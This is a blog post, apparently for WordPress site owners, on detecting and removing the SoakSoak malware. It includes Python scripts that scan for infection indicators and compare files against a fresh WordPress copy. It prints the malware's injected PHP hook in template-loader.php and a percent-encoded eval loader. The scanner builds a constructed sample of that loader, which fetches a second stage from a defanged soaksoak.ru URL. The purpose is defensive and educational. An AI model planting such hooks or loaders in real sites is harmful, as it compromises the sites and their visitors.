How to disinfect website infected from SoakSoak malware

Recently more than 100,000 WordPress websites were infected by the SoakSoak malware. In a report by the security firm Sucuri, which can be found here, it was found that Google had already blacklisted more than 11,000 domains because of the campaign run from SoakSoak.ru. The reason the affected sites were vulnerable had not yet been clarified at the time of writing, but all of the websites on the Inspire2rise network were safe, mainly because of the security measures and DNS-level filtering we have in place. So what can you do if your site is already infected? Recently a friend, Harshmeet Singh from RootMyAndroid.org, told us that his website had been infected, and through his experience we found several working methods for removing the SoakSoak malware from sites running WordPress. Read on to learn how to disinfect a website infected with the SoakSoak malware.

How to disinfect website infected from SoakSoak malware : Identification.
First you need to identify whether your site has actually been infected by the SoakSoak.ru malware. There are two ways to do this. The first is to look for the suspicious code that the malware adds to your site's files and serves to visitors.
The malware modifies wp-includes/template-loader.php so that it contains the following code:
<?php function FuncQueueObject() { wp_enqueue_script("swfobject"); } add_action("wp_enqueue_scripts", 'FuncQueueObject');
This enqueues the "swfobject" script, so another core file, wp-includes/js/swfobject.js, is loaded on every page of the site. The malware replaces the contents of that file with the following obfuscated JavaScript:
eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
Decoded, this JavaScript creates a script element, sets its id to xxyyzz_petushok and appends it to the page head, which loads the next stage of the SoakSoak.ru malware from hxxp://soaksoak.ru/xteas/code (URL defanged) on every page view.
If you find this code in your files or in the pages your site serves, or if you are unsure whether your site is clean, the second check is to run it through the free website security scanner provided by Sucuri.
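As an added example (not code from the original article or from Sucuri), the following Python script automates the first check: it walks a WordPress install, looks for the indicators listed above in the files they were seen in, and decodes the decodeURIComponent() payload so that the URL the loader fetches is found even though it never appears in the file as plain text. The infected sample site it builds in a temporary directory is constructed here for illustration; to use it for real, point scan_tree() at a copy of your document root.

```python
"""Scan a WordPress tree for the SoakSoak indicators described above.

Added example, not from the original article. The indicators are the ones the
article lists; build_sample_site() writes a constructed, minimal infected
install so the script runs offline.
"""
import os
import re
import tempfile
from urllib.parse import unquote

# Indicators the article describes, keyed by the file they were seen in.
INDICATORS = {
    "wp-includes/template-loader.php": ["FuncQueueObject", 'wp_enqueue_script("swfobject")'],
    "wp-includes/js/swfobject.js": ["eval(decodeURIComponent("],
}
MALWARE_DOMAIN = "soaksoak.ru"

EVAL_RE = re.compile(r'eval\s*\(\s*decodeURIComponent\s*\(\s*"([^"]*)"\s*\)\s*\)')
SRC_RE = re.compile(r"""\.src\s*=\s*['"]([^'"]+)['"]""")


def decode_payload(js_text):
    """Return the decoded body of an eval(decodeURIComponent("...")) wrapper, or None."""
    m = EVAL_RE.search(js_text)
    if not m:
        return None
    return unquote(m.group(1))


def loaded_urls(js_text):
    """URLs assigned to script.src inside the decoded payload (what the loader fetches)."""
    decoded = decode_payload(js_text)
    return SRC_RE.findall(decoded) if decoded else []


def scan_tree(root):
    """Walk a WordPress install and return sorted (relative path, indicator) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for needle in INDICATORS.get(rel, []):
                if needle in text:
                    findings.append((rel, needle))
            if MALWARE_DOMAIN in text:           # plain-text reference anywhere
                findings.append((rel, MALWARE_DOMAIN))
            for url in loaded_urls(text):        # reference hidden inside the encoded payload
                if MALWARE_DOMAIN in url:
                    findings.append((rel, "loads " + url))
    return sorted(set(findings))


# Constructed loader in the shape of the decoded payload shown in the article:
# it appends a <script> tag that pulls the second stage from the malware domain.
SAMPLE_LOADER = (
    "(\r\nfunction()\r\n{\r\n"
    "\tvar head=document.getElementsByTagName('head')[0];\r\n"
    "\tvar script=document.createElement('script');\r\n"
    "\tscript.src='hxxp://soaksoak.ru/xteas/code';\r\n"   # defanged URL, as in the article
    "\tscript.id='xxyyzz_petushok';\r\n"
    "\thead.appendChild(script);\r\n}()\r\n);"
)


def percent_encode(text):
    """Encode every character as %XX, the form the injected swfobject.js uses."""
    return "".join("%%%02X" % b for b in text.encode("utf-8"))


def build_sample_site(root):
    """Write a constructed, minimal infected install under root."""
    files = {
        "wp-includes/template-loader.php": (
            '<?php function FuncQueueObject() { wp_enqueue_script("swfobject"); } '
            "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');\n"
            "/**\n * Loads the correct template based on the visitor's url\n */\n"
        ),
        "wp-includes/js/swfobject.js": (
            'eval(decodeURIComponent("%s"));\n' % percent_encode(SAMPLE_LOADER)
        ),
        "wp-includes/js/clean.js": "/* untouched file */\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Build the sample site in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, what in demo():
        print("%s: %s" % (rel, what))
```

A plain grep for the domain name would miss the infected swfobject.js entirely, because the whole loader is percent-encoded; decoding the payload first is what makes the URL visible.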
How to disinfect website infected from SoakSoak malware : The steps.
To disinfect your website, perform the following steps in this exact order:
- Download the official WordPress zip from WordPress.org here. Use the same version your site is running so that the replaced core files match the rest of the install.
- Extract the zip somewhere on your desktop and copy the wp-includes folder out of it.
- Log in to your hosting account or cPanel, open the file manager and go to the directory where your site is hosted. Delete the wp-includes folder there and upload the fresh wp-includes folder from the zip in its place.
- Clear all existing caches, both in caching plugins and in any CDN you use (MaxCDN, Cloudflare, Google PageSpeed and so on); otherwise cached copies of the infected pages will keep being served.
- Check the site again in a browser with a cleared cache or an incognito window to see whether the malicious script is still being served. If it comes back after a clean replacement, something else on the site is reinfecting it (an outdated plugin or theme, or a file dropped outside wp-includes), so update everything and compare the rest of the install against the fresh copy as well.
- Once the malware is gone, it is time to harden the site. Install the iThemes Security plugin for WordPress and configure it using our guide, How to secure WordPress.
- DNS-level filtering through a service like Cloudflare, or a compatible web application firewall, can protect you from many future attacks, so keep that in mind too.
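As an added example (not from the original article), this Python script performs the check that the delete-and-replace step above does not give you on its own: it hashes every file in the live wp-includes folder and in the wp-includes folder from the fresh zip, then reports files that differ, files the fresh copy does not contain (anything in there does not belong to WordPress and deserves a look), and files that are missing. The sample trees are constructed in a temporary directory for illustration; in practice, point compare_trees() at a copy of your live folder and at the extracted download, and the same comparison works for wp-admin.

```python
"""Check a live WordPress folder against a fresh copy from WordPress.org.

Added example, not from the original article. It assumes the official zip has
already been extracted locally and that the live folder has been copied down
(via cPanel's file manager or SFTP). The sample trees are constructed here so
the script runs offline.
"""
import hashlib
import os
import tempfile


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hash_tree(root):
    """Map relative path -> SHA-256 for every file under root."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            digests[rel] = sha256_file(path)
    return digests


def compare_trees(live_root, reference_root):
    """Files that differ from the fresh copy, exist only on the live site, or are missing."""
    live = hash_tree(live_root)
    ref = hash_tree(reference_root)
    return {
        "modified": sorted(p for p in live if p in ref and live[p] != ref[p]),
        # Anything the official zip does not ship is suspect: dropped files live here.
        "unexpected": sorted(p for p in live if p not in ref),
        "missing": sorted(p for p in ref if p not in live),
    }


def write_files(root, files):
    """Write {relative path: body} under root, creating directories as needed."""
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


# Constructed sample trees (placeholder bodies, not real WordPress sources).
TEMPLATE_LOADER_BODY = "/**\n * Loads the correct template based on the visitor's url\n */\n"
INJECTED_LINE = (
    '<?php function FuncQueueObject() { wp_enqueue_script("swfobject"); } '
    "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');\n"
)
REFERENCE_FILES = {
    "template-loader.php": "<?php\n" + TEMPLATE_LOADER_BODY,
    "js/swfobject.js": "/* placeholder for the official swfobject.js */\n",
    "version.php": "<?php // placeholder for the official version.php\n",
}
LIVE_FILES = {
    "template-loader.php": INJECTED_LINE + TEMPLATE_LOADER_BODY,       # still carries the loader
    "js/swfobject.js": 'eval(decodeURIComponent("%2E%2E%2E"));\n',      # still obfuscated
    "version.php": REFERENCE_FILES["version.php"],                       # untouched
    "js/.cache.php": "<?php /* not part of any WordPress release */\n",  # dropped file
}


def demo():
    """Build both sample trees in a temp dir and return the comparison."""
    with tempfile.TemporaryDirectory() as tmp:
        live = os.path.join(tmp, "live", "wp-includes")
        fresh = os.path.join(tmp, "fresh", "wp-includes")
        write_files(live, LIVE_FILES)
        write_files(fresh, REFERENCE_FILES)
        return compare_trees(live, fresh)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print("%s: %s" % (kind, ", ".join(paths) or "(none)"))
```

Run it before the replacement to see exactly what was touched, and again afterwards: a clean result is an empty list in all three categories.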
Now that you know how to clean your website of the SoakSoak malware, share this article with friends or anyone you know who may be suffering from this attack. If you have any doubts or questions, or another working method for disinfecting a website infected with the SoakSoak malware, feel free to comment below!
Keep visiting for more awesome security articles, WordPress tips and remember we cover, “Everything under the Sun!”
Stay Inspired to rise fellas!
Thank you for posting. 🙂
I think the issue has been commented on superbly. I will follow. Thank you.